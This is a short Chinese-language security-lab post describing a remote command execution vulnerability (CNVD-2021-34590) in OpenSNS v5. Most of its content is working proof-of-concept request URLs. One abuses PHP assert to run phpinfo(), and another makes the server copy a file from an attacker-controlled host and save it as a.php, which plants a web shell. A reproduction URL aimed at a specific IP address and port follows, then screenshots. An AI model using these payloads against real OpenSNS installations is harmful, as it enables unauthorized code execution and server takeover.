CNVD-2021-34590
漏洞描述:OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令
影响版本:OpenSNS v5
参考资料:
- https://chowdera.com/2021/12/202112291815386593.html
- https://xz.aliyun.com/t/10013
- https://blog.csdn.net/qq_48985780/article/details/122215945
POC:
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=copy(%27http://xxx/a.txt(此处为自己公网服务器ip)%27,%27a.php%27)
漏洞复现
http://123.58.224.8:19497/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()
![图片[1]-【初级】OpenSNS 远程命令执行漏洞-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/10/d2b5ca33bd141855.png)
![图片[2]-【初级】OpenSNS 远程命令执行漏洞-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/10/d2b5ca33bd141911-1024x627.png)
![图片[3]-【初级】OpenSNS 远程命令执行漏洞-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/10/d2b5ca33bd141926.png)
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容